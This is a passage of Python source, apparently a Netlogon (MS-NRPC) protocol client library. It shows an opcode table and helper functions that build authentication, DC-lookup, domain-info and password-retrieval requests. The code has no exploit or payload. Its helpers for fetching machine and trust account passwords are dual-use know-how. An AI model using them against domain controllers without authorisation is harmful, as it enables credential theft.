2643 |  22 : (NetrLogonSetServiceBits, NetrLogonSetServiceBitsResponse),
2644 |  23 : (NetrLogonGetTrustRid, NetrLogonGetTrustRidResponse),
2645 |  24 : (NetrLogonComputeServerDigest, NetrLogonComputeServerDigestResponse),
2646 |  25 : (NetrLogonComputeClientDigest, NetrLogonComputeClientDigestResponse),
2647 |  26 : (NetrServerAuthenticate3, NetrServerAuthenticate3Response),
2648 |  27 : (DsrGetDcNameEx, DsrGetDcNameExResponse),
2649 |  28 : (DsrGetSiteName, DsrGetSiteNameResponse),
2650 |  29 : (NetrLogonGetDomainInfo, NetrLogonGetDomainInfoResponse),
2651 | # 30 : (NetrServerPasswordSet2, NetrServerPasswordSet2Response),
2652 |  31 : (NetrServerPasswordGet, NetrServerPasswordGetResponse),
2653 |  32 : (NetrLogonSendToSam, NetrLogonSendToSamResponse),
2654 |  33 : (DsrAddressToSiteNamesW, DsrAddressToSiteNamesWResponse),
2655 |  34 : (DsrGetDcNameEx2, DsrGetDcNameEx2Response),
2656 |  35 : (NetrLogonGetTimeServiceParentDomain, NetrLogonGetTimeServiceParentDomainResponse),
2657 |  36 : (NetrEnumerateTrustedDomainsEx, NetrEnumerateTrustedDomainsExResponse),
2658 |  37 : (DsrAddressToSiteNamesExW, DsrAddressToSiteNamesExWResponse),
2659 |  38 : (DsrGetDcSiteCoverageW, DsrGetDcSiteCoverageWResponse),
2660 |  39 : (NetrLogonSamLogonEx, NetrLogonSamLogonExResponse),
2661 |  40 : (DsrEnumerateDomainTrusts, DsrEnumerateDomainTrustsResponse),
2662 |  41 : (DsrDeregisterDnsHostRecords, DsrDeregisterDnsHostRecordsResponse),
2663 |  42 : (NetrServerTrustPasswordsGet, NetrServerTrustPasswordsGetResponse),
2664 |  43 : (DsrGetForestTrustInformation, DsrGetForestTrustInformationResponse),
2665 |  44 : (NetrGetForestTrustInformation, NetrGetForestTrustInformationResponse),
2666 |  45 : (NetrLogonSamLogonWithFlags, NetrLogonSamLogonWithFlagsResponse),
2667 |  46 : (NetrServerGetTrustInfo, NetrServerGetTrustInfoResponse),
2668 | # 48 : (DsrUpdateReadOnlyServerDnsRecords, DsrUpdateReadOnlyServerDnsRecordsResponse),
2669 | # 49 : (NetrChainSetClientAttributes, NetrChainSetClientAttributesResponse),
2670 | }
2671 | 
2672 | ################################################################################
2673 | # HELPER FUNCTIONS
2674 | ################################################################################
2675 | def checkNullString(string):
2676 |     if string == NULL:
2677 |         return string
2678 | 
2679 |     if string[-1:] != '\x00':
2680 |         return string + '\x00'
2681 |     else:
2682 |         return string
2683 | 
2684 | def hNetrServerReqChallenge(dce, primaryName, computerName, clientChallenge):
2685 |     request = NetrServerReqChallenge()
2686 |     request['PrimaryName'] = checkNullString(primaryName)
2687 |     request['ComputerName'] = checkNullString(computerName)
2688 |     request['ClientChallenge'] = clientChallenge
2689 |     return dce.request(request)
2690 | 
2691 | def hNetrServerAuthenticate3(dce, primaryName, accountName, secureChannelType, computerName, clientCredential, negotiateFlags):
2692 |     request = NetrServerAuthenticate3()
2693 |     request['PrimaryName'] = checkNullString(primaryName)
2694 |     request['AccountName'] = checkNullString(accountName)
2695 |     request['SecureChannelType'] = secureChannelType
2696 |     request['ClientCredential'] = clientCredential
2697 |     request['ComputerName'] = checkNullString(computerName)
2698 |     request['NegotiateFlags'] = negotiateFlags
2699 |     return dce.request(request)
2700 | 
2701 | def hDsrGetDcNameEx2(dce, computerName, accountName, allowableAccountControlBits, domainName, domainGuid, siteName, flags):
2702 |     request = DsrGetDcNameEx2()
2703 |     request['ComputerName'] = checkNullString(computerName)
2704 |     request['AccountName'] = checkNullString(accountName)
2705 |     request['AllowableAccountControlBits'] = allowableAccountControlBits
2706 |     request['DomainName'] = checkNullString(domainName)
2707 |     request['DomainGuid'] = domainGuid
2708 |     request['SiteName'] = checkNullString(siteName)
2709 |     request['Flags'] = flags
2710 |     return dce.request(request)
2711 | 
2712 | def hDsrGetDcNameEx(dce, computerName, domainName, domainGuid, siteName, flags):
2713 |     request = DsrGetDcNameEx()
2714 |     request['ComputerName'] = checkNullString(computerName)
2715 |     request['DomainName'] = checkNullString(domainName)
2716 |     request['DomainGuid'] = domainGuid
2717 |     request['SiteName'] = siteName
2718 |     request['Flags'] = flags
2719 |     return dce.request(request)
2720 | 
2721 | def hDsrGetDcName(dce, computerName, domainName, domainGuid, siteGuid, flags):
2722 |     request = DsrGetDcName()
2723 |     request['ComputerName'] = checkNullString(computerName)
2724 |     request['DomainName'] = checkNullString(domainName)
2725 |     request['DomainGuid'] = domainGuid
2726 |     request['SiteGuid'] = siteGuid
2727 |     request['Flags'] = flags
2728 |     return dce.request(request)
2729 | 
2730 | def hNetrGetAnyDCName(dce, serverName, domainName):
2731 |     request = NetrGetAnyDCName()
2732 |     request['ServerName'] = checkNullString(serverName)
2733 |     request['DomainName'] = checkNullString(domainName)
2734 |     return dce.request(request)
2735 | 
2736 | def hNetrGetDCName(dce, serverName, domainName):
2737 |     request = NetrGetDCName()
2738 |     request['ServerName'] = checkNullString(serverName)
2739 |     request['DomainName'] = checkNullString(domainName)
2740 |     return dce.request(request)
2741 | 
2742 | def hDsrGetSiteName(dce, computerName):
2743 |     request = DsrGetSiteName()
2744 |     request['ComputerName'] = checkNullString(computerName)
2745 |     return dce.request(request)
2746 | 
2747 | def hDsrGetDcSiteCoverageW(dce, serverName):
2748 |     request = DsrGetDcSiteCoverageW()
2749 |     request['ServerName'] = checkNullString(serverName)
2750 |     return dce.request(request)
2751 | 
2752 | def hNetrServerAuthenticate2(dce, primaryName, accountName, secureChannelType, computerName, clientCredential, negotiateFlags):
2753 |     request = NetrServerAuthenticate2()
2754 |     request['PrimaryName'] = checkNullString(primaryName)
2755 |     request['AccountName'] = checkNullString(accountName)
2756 |     request['SecureChannelType'] = secureChannelType
2757 |     request['ClientCredential'] = clientCredential
2758 |     request['ComputerName'] = checkNullString(computerName)
2759 |     request['NegotiateFlags'] = negotiateFlags
2760 |     return dce.request(request)
2761 | 
2762 | def hNetrServerAuthenticate(dce, primaryName, accountName, secureChannelType, computerName, clientCredential):
2763 |     request = NetrServerAuthenticate()
2764 |     request['PrimaryName'] = checkNullString(primaryName)
2765 |     request['AccountName'] = checkNullString(accountName)
2766 |     request['SecureChannelType'] = secureChannelType
2767 |     request['ClientCredential'] = clientCredential
2768 |     request['ComputerName'] = checkNullString(computerName)
2769 |     return dce.request(request)
2770 | 
2771 | def hNetrServerPasswordGet(dce, primaryName, accountName, accountType, computerName, authenticator):
2772 |     request = NetrServerPasswordGet()
2773 |     request['PrimaryName'] = checkNullString(primaryName)
2774 |     request['AccountName'] = checkNullString(accountName)
2775 |     request['AccountType'] = accountType
2776 |     request['ComputerName'] = checkNullString(computerName)
2777 |     request['Authenticator'] = authenticator
2778 |     return dce.request(request)
2779 | 
2780 | def hNetrServerTrustPasswordsGet(dce, trustedDcName, accountName, secureChannelType, computerName, authenticator):
2781 |     request = NetrServerTrustPasswordsGet()
2782 |     request['TrustedDcName'] = checkNullString(trustedDcName)
2783 |     request['AccountName'] = checkNullString(accountName)
2784 |     request['SecureChannelType'] = secureChannelType
2785 |     request['ComputerName'] = checkNullString(computerName)
2786 |     request['Authenticator'] = authenticator
2787 |     return dce.request(request)
2788 | 
2789 | def hNetrLogonGetDomainInfo(dce, serverName, computerName, authenticator, returnAuthenticator=0, level=1):
2790 |     request = NetrLogonGetDomainInfo()
2791 |     request['ServerName'] = checkNullString(serverName)
2792 |     request['ComputerName'] = checkNullString(computerName)
2793 |     request['Authenticator'] = authenticator
2794 |     if returnAuthenticator == 0:
2795 |         request['ReturnAuthenticator']['Credential'] = b'\x00'*8
2796 |         request['ReturnAuthenticator']['Timestamp'] = 0
2797 |     else:
2798 |         request['ReturnAuthenticator'] = returnAuthenticator
2799 | 
2800 |     request['Level'] = 1
2801 |     if level == 1:
2802 |         request['WkstaBuffer']['tag'] = 1
2803 |         request['WkstaBuffer']['WorkstationInfo']['DnsHostName'] = NULL
2804 |         request['WkstaBuffer']['WorkstationInfo']['SiteName'] = NULL
2805 |         request['WkstaBuffer']['WorkstationInfo']['OsName'] = ''
2806 |         request['WkstaBuffer']['WorkstationInfo']['Dummy1'] = NULL
2807 |         request['WkstaBuffer']['WorkstationInfo']['Dummy2'] = NULL
2808 |         request['WkstaBuffer']['WorkstationInfo']['Dummy3'] = NULL
2809 |         request['WkstaBuffer']['WorkstationInfo']['Dummy4'] = NULL
2810 |     else:
2811 |         request['WkstaBuffer']['tag'] = 2
2812 |         request['WkstaBuffer']['LsaPolicyInfo']['LsaPolicy'] = NULL
2813 |     return dce.request(request)
2814 | 
2815 | def hNetrLogonGetCapabilities(dce, serverName, computerName, authenticator, returnAuthenticator=0, queryLevel=1):
2816 |     request = NetrLogonGetCapabilities()
2817 |     request['ServerName'] = checkNullString(serverName)
2818 |     request['ComputerName'] = checkNullString(computerName)
2819 |     request['Authenticator'] = authenticator
2820 |     if returnAuthenticator == 0:
2821 |         request['ReturnAuthenticator']['Credential'] = b'\x00'*8
2822 |         request['ReturnAuthenticator']['Timestamp'] = 0
2823 |     else:
2824 |         request['ReturnAuthenticator'] = returnAuthenticator
2825 |     request['QueryLevel'] = queryLevel
2826 |     return dce.request(request)
2827 | 
2828 | def hNetrServerGetTrustInfo(dce, trustedDcName, accountName, secureChannelType, computerName, authenticator):
2829 |     request = NetrServerGetTrustInfo()
2830 |     request['TrustedDcName'] = checkNullString(trustedDcName)
2831 |     request['AccountName'] = checkNullString(accountName)
2832 |     request['SecureChannelType'] = secureChannelType
2833 |     request['ComputerName'] = checkNullString(computerName)
2834 |     request['Authenticator'] = authenticator
2835 |     return dce.request(request)
2836 | 


--------------------------------------------------------------------------------